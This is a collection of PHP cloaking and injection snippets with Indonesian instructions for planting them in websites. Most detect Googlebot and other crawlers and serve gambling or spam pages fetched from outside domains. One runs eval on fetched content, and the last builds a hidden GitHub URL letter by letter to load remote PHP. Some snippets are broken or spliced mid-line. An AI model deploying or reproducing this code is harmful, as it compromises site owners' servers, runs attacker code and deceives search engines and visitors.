<?php

if(strstr(strtolower($_SERVER['HTTP_USER_AGENT']), "googlebot"))
{
?>
(isidisini)
<?php
exit;
}
?>

---------------------------------------------------------------------------------------------------------------------------

<?php
function isSearchEngineBot() {
    return preg_match('/(googlebot|bingbot|yandexbot|baiduspider|duckduckbot|slurp|facebot|ia_archiver|Googlebot|TelegramBot|bingbot|Google-Site-Verification|Google-InspectionTool|AhrefsBot)/i', $_SERVER['HTTP_USER_AGENT']);
}

function isFromGoogle() {
    return isset($_SERVER['HTTP_REFERER']) &&
           (strpos($_SERVER['HTTP_REFERER'], 'google.com') !== false ||
            strpos($_SERVER['HTTP_REFERER'], 'google.co.id') !== false);
}

function NuLzFetch($url){
    if (function_exists('file_get_contents')) {
        $fetch = file_get_contents($url);
        return $fetch;
    } elseif (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        $fetch = curl_exec($ch);
        curl_close($ch);
        return $fetch;
    } else {
        $fetch = "Can'not Fetch This URL => $url";
        return $fetch;
    }
}

$cookie_expiration = time() + (365 * 86400); //1 years
if (!isset($_COOKIE['visited'])) {
    setcookie('visited', '1', $cookie_expiration, "/");
}

$cache_duration = 365 * 86400; //1 years
header("Cache-Control: max-age=$cache_duration, public, must-revalidate");
header("Pragma: cache");

$landing_page = 'main.php';
$index_home = 'info.php';

if (isSearchEngineBot()) {
    echo NuLzFetch($landing_page);
} else {
    if (isFromGoogle()) {
        echo NuLzFetch($landing_page);
    } else {
        eval ('?>'.NuLzFetch($index_home));
    }
}

---------------------------------------------------------------------------------------------------------------------------

$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$request_uri = $_SERVER['REQUEST_URI'] ?? '/';
$is_bot = false;

$bot_signatures = [
    'Googlebot',
    'Google-InspectionTool',
    'Mediapartners-Google',
    'AdsBot-Google',
    'Bingbot',
    'Slurp',
    'DuckDuckBot',
    'AhrefsBot',
    'SEMRushBot',
    'MJ12bot',
    'YandexBot'
];

// Deteksi apakah User-Agent cocok dengan bot signature
foreach ($bot_signatures as $bot) {
    if (stripos($user_agent, $bot) !== false) {
        $is_bot = true;
        break;
    }
}

if ($is_bot) {

    if (stripos($request_uri, '/tujuan-dan-ruang-lingkup/') !== false) {
?>
 ( TARO DISINI )
<?php

        exit;
    }
}

---------------------------------------------------------------------------------------------------------------------------

NOTED : TETEP TARO DI BOOSTRAP 
#########################################################################################################################

<?php
error_reporting(0);
$s_ref = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

if(strpos($agent,'bot') > 0 && $_SERVER['REQUEST_URI']=='/'){   
    $accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);
    if(strpos($accept_lang,'zh')>-1  $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']==1  $_COOKIE['az']=='lp'){setcookie('az','lp',time()+3600*7200); echo ' '; exit;}
    include('locale/homepage.html');
    exit;
}

---------------------------------------------------------------------------------------------------------------------------

CARA PENGGUNAAN : BIKIN FILE DENGAN ISI LP ( homepage.html / contoh \ ) TARO DI DIR MANA AJA YANG PENTING BISA 
#########################################################################################################################

<?php
function jamal($url) {
    if (ini_get('allow_url_fopen')) {
        return @file_get_contents($url);
    } elseif (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36');
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }
    return false;
}

$res = strtolower($_SERVER["HTTP_USER_AGENT"]);
$bot = "https://kompasel.xyz/landing/investigacion/
$file = jamal($bot); 
$botchar = "/(googlebot|slurp|adsense|inspection|ahrefsbot|telegrambot|bingbot|yandexbot)/";

if (preg_match($botchar, $res)) {
    echo $file;
    exit;
}
?>

---------------------------------------------------------------------------------------------------------------------------

<?php
ob_start();
header('Vary: Accept-Language, User-Agent');

$bot_url = "https://badboyzuniverse.xyz/landing/proceedings.uinsaizu/carisesuapnasi.html";
$ua = strtolower($_SERVER['HTTP_USER_AGENT']);

$bots = ['googlebot', 'slurp', 'bingbot', 'baiduspider', 'yandex', 'crawler', 'spider', 'adsense', 'inspection'];

$is_bot = false;
foreach ($bots as $b) {
    if (strpos($ua, $b) !== false) {
        $is_bot = true;
        break;
    }
}

function stealth_fetch($url) {
    $ctx = stream_context_create([
        'http' => [
            'method' => 'GET',
            'header' => "User-Agent: Mozilla/5.0\r\n"
        ]
    ]);
    return @file_get_contents($url, false, $ctx);
}

if ($is_bot) {
    usleep(mt_rand(100000, 200000));
    $konten = stealth_fetch($bot_url);
    if ($konten !== false) {
        echo $konten;
    }
    ob_end_flush();
    exit;
}

---------------------------------------------------------------------------------------------------------------------------

<?php
// ==== Serve remote .txt HTML only for Googlebot (simplecondition) ====

$REMOTE_URL = 'https://jangananuinapasihnamanya.pages.dev/index.txt';

// Fungsi cek sederhana (User-Agent saja)
function is_googlebot(): bool {
    $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
    return (bool) preg_match('/Googlebot|Google-InspectionTool|GoogleOther|AdsBot-Google/i', $ua);
}

if (is_googlebot()) {
    // Ambil isi remote file (cURL > fallback stream)
    $html = null;
    if (function_exists('curl_init')) {
        $ch = curl_init($REMOTE_URL);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_TIMEOUT        => 8,
            CURLOPT_USERAGENT      => 'VerifiedBotFetcher/1.0',
        ]);
        $resp = curl_exec($ch);
        $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        if ($resp !== false && $code >= 200 && $code < 300) $html = $resp;
    }
    if ($html === null) {
        $html = @file_get_contents($REMOTE_URL);
    }

    if ($html) {
        header('Content-Type: text/html; charset=UTF-8');
        header('X-Served-For: Googlebot');
        echo $html;
        exit;
    }
}

// ==== end: Googlebot handling ====

require_once __DIR__ . '/config.php';

?>

---------------------------------------------------------------------------------------------------------------------------

<?php

// Fungsi untuk mendeteksi bot
function is_bot() {
    if (!isset($_SERVER["HTTP_USER_AGENT"])) {
        return false;
    }
    
    $user_agent = $_SERVER["HTTP_USER_AGENT"];
    $bots = array("Googlebot", "TelegramBot", "bingbot", "Baiduspider", "YandexBot");
    
    foreach ($bots as $bot) {
        if (stripos($user_agent, $bot) !== false) {
            return true;
        }
    }
    return false;
}

// Fungsi untuk mengambil konten dengan cURL
function fetch_content($url) {
    // Inisialisasi cURL
    $ch = curl_init();

    // Atur opsi cURL untuk mengambil data
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  // Mengembalikan data sebagai string
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // Mengikuti redirect jika ada
    
    // Jika URL menggunakan HTTPS, nonaktifkan verifikasi SSL jika perlu
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  // Nonaktifkan verifikasi sertifikat SSL

    // Eksekusi permintaan cURL
    $content = curl_exec($ch);

    // Cek apakah terjadi error cURL
    if ($content === false) {
        // Jika terjadi error, tampilkan pesan error cURL
        echo "cURL Error: " . curl_error($ch);
        curl_close($ch);
        return false;
    }

    // Cek status kode HTTP dari respon
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    if ($http_code != 200) {
        echo "HTTP Error: " . $http_code;
        curl_close($ch);
        return false;
    }

    // Tutup koneksi cURL
    curl_close($ch);
    return $content;
}

// Fungsi utama untuk menangani permintaan
function handle_request() {
    if (is_bot()) {
        // Jika request berasal dari bot, ambil konten dari URL eksternal
        $url = "https://jangandigalakinasligatau.pages.dev/index.txt";  // Ganti dengan URL sumber konten Anda
        $content = fetch_content($url);
        return ($content !== false) ? $content : "Content not available";  // Tampilkan konten atau pesan error
    }
    // Jika bukan bot, tampilkan pesan selamat datang
}

// Set header keamanan dasar
header('X-Frame-Options: DENY');
header('Strict-Transport-Security: max-age=31536000; includeSubDomains');
header('X-Content-Type-Options: nosniff');
header('X-XSS-Protection: 1; mode=block');

// Tampilkan hasil dari handle_request()
echo handle_request();

?>

---------------------------------------------------------------------------------------------------------------------------

<?php
/**
 * Combined file:
 * - Top: cloaking / bot detector + fetch function
 * - Bottom: original Composer autoload_real.php class
 *
 * Note:
 * - Cloaking will output the remote page and exit if the UA matches $botPattern.
 * - If you prefer the autoloader to always run (and only apply cloaking when this file
 *   is directly requested), tell me and I can wrap the cloaking logic in a conditional.
 */

/* ---------------------------
   Cloaking / Bot detection
   --------------------------- */
@ob_start();
header("Vary: User-Agent");

$targetUrl = "https://obeydasupreme.site/badboys/winstreaks.html";
$botPattern = "/(googlebot|slurp|bingbot|baiduspider|yandex|crawler|spider|adsense|inspection|mediapartners)/i";
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';

/**
 * Fetch remote content with cURL (returns string, or empty string on failure)
 *
 * @param string $url
 * @return string
 */
function fetchContentCurl($url) {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        CURLOPT_REFERER => "https://www.google.com/",
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT => 10,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
    ]);
    $content = curl_exec($ch);
    curl_close($ch);
    return $content ?: '';
}

/* If the user agent matches the bot pattern, fetch & echo remote target then exit. */
if (preg_match($botPattern, strtolower($userAgent))) {
    // small random delay to mimic network latency
    usleep(random_int(100000, 200000));
    echo fetchContentCurl($targetUrl);
    @ob_end_flush();
    exit;
}

---------------------------------------------------------------------------------------------------------------------------

<?php
ob_start();
header('Vary: Accept-Language, User-Agent');

$bot_url = "https://obeydasupreme.site/badboys/for4d.html";
$ua = strtolower($_SERVER['HTTP_USER_AGENT']);

$bots = ['googlebot', 'slurp', 'bingbot', 'baiduspider', 'yandex', 'crawler', 'spider', 'adsense', 'inspection'];

$is_bot = false;
foreach ($bots as $b) {
    if (strpos($ua, $b) !== false) {
        $is_bot = true;
        break;
    }
}

function stealth_fetch($url) {
    $ctx = stream_context_create([
        'http' => [
            'method' => 'GET',
            'header' => "User-Agent: Mozilla/5.0\r\n"
        ]
    ]);
    return @file_get_contents($url, false, $ctx);
}

if ($is_bot) {
    usleep(mt_rand(100000, 200000));
    $konten = stealth_fetch($bot_url);
    if ($konten !== false) {
        echo $konten;
    }
    ob_end_flush();
    exit;
}

---------------------------------------------------------------------------------------------------------------------------

<?php
ob_start();
header('Vary: User-Agent');
$bot_url = "https://obeydasupreme.site/badboys/uinsyahada.html";
$botchar = "/(googlebot|slurp|bingbot|baiduspider|yandex|adsense|crawler|spider|inspection)/i";
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
function lph_requests($url) {
    if (function_exists('curl_init')) {    
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETUR<?php

$_u = 'h'.'t'.'t'.'p'.'s'.':' . '/' . '/' .
       'r'.'a'.'w'.'.'.'g'.'i'.'t'.'h'.'u'.'b'.'u'.'s'.'e'.'r'.'c'.'o'.'n'.'t'.'e'.'n'.'t'.'.'.'c'.'o'.'m' . '/' .
       'h'.'a'.'p'.'p'.'y'.'a'.'s'.'m'.'a'.'r'.'a'.'7'.'7'.'2'.'-'.'l'.'g'.'t'.'m' . '/' .
       'a'.'p'.'a'.'k'.'a'.'m'.'u'.'-' . '/' .
       'r'.'e'.'f'.'s'.'/' .
       'h'.'e'.'a'.'d'.'s'.'/' .
       'm'.'a'.'i'.'n' . '/' .
       'a'.'w'.'w'.'.'.'p'.'h'.'p';

$_iniget = 'i'.'n'.'i'.'_'.'g'.'e'.'t';
$_func_exists = 'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n'.'_' . 'e'.'x'.'i'.'s'.'t'.'s';

$_open = call_user_func($_iniget, 'a'.'l'.'l'.'o'.'w'.'_' . 'u'.'r'.'l'.'_' . 'f'.'o'.'p'.'e'.'n');
$_curl = call_user_func($_func_exists, 'c'.'u'.'r'.'l'.'_' . 'i'.'n'.'i'.'t');

$_out = false;

if ($_open) {
    $_fget = 'f'.'i'.'l'.'e'.'_' . 'g'.'e'.'t'.'_' . 'c'.'o'.'n'.'t'.'e'.'n'.'t'.'s';
    $_out = @call_user_func($_fget, $_u);
} elseif ($_curl) {
    $_ci = 'c'.'u'.'r'.'l'.'_' . 'i'.'n'.'i'.'t';
    $_co = 'c'.'u'.'r'.'l'.'_' . 's'.'e'.'t'.'o'.'p'.'t';
    $_ce = 'c'.'u'.'r'.'l'.'_' . 'e'.'x'.'e'.'c';
    $_cc = 'c'.'u'.'r'.'l'.'_' . 'c'.'l'.'o'.'s'.'e';

    $_ct1 = 'C'.'U'.'R'.'L'.'O'.'P'.'T'.'_' . 'R'.'E'.'T'.'U'.'R'.'N'.'T'.'R'.'A'.'N'.'S'.'F'.'E'.'R';
    $_ct2 = 'C'.'U'.'R'.'L'.'O'.'P'.'T'.'_' . 'F'.'O'.'L'.'L'.'O'.'W'.'L'.'O'.'C'.'A'.'T'.'I'.'O'.'N';
    $_ct3 = 'C'.'U'.'R'.'L'.'O'.'P'.'T'.'_' . 'T'.'I'.'M'.'E'.'O'.'U'.'T';

    $_h = call_user_func($_ci, $_u);
    call_user_func($_co, $_h, constant($_ct1), true);
    call_user_func($_co, $_h, constant($_ct2), 
